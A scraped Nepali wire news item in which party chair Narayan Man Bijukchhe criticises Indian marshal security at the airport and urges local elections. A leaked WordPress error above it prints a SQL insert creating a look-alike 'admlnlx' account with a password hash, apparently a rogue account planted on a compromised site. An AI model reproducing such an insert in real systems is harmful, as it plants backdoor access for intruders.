WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQAQJeMHCSL0jo/vy/aOt3vtT3BEln0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 06:23:06', '', 'admlnlx', 'admlnlx')
भक्तपुर,माघ १२ –
नेपाल मजदुर किसान पार्टीका अध्यक्ष नारायणमान बिजुक्छेंले विमानस्थलमा भारतीय मार्सल सुरक्षा राख्नु नेपालको हितमा नहुने बताउनुभएको छ ।
रफत सञ्चार क्लबले आयोजना गरेको साक्षात्कार कार्यक्रममा उहाँले भन्नुभयो – संविधानको सफल कार्यान्वयनका लागि स्थानीय तहको निर्वाचन सबैभन्दा पहिलो आवश्यकता रहेको छ ।
अध्यक्ष बिजुक्छेंले ठूला दलको खर्च र विगतका आपराधिक चरित्र भएकालाई रोक लगाउन थ्रेस होल्ड आवश्यक रहेको बताउँदै स्थानीय तहको निर्वाचनका बारे सरकारले मुखले मात्र बोलेको तर व्यवहारमा कुनै तयारी नगरेको भन्नुभयो ।
धर्मका नाममा जातजाति, भाषाभाषी र क्षेत्रका नाममा दल खोल्न नहुने भएपनि देशलाई जुन÷जुन विषयले घाटा पुग्छ, त्यहीँ काम अर्कैको इशारामा गर्दा देश नै टुक्रिने अवस्थामा आइपुगेको बताउँदै उहाँले संविधान संशोधनको विषयलाई अल्झाउन समेत निर्वाचनको विषयलाई बोलीमा मात्रै व्यापकता दिएको धारणा व्यक्त गर्नुभयो । – रासस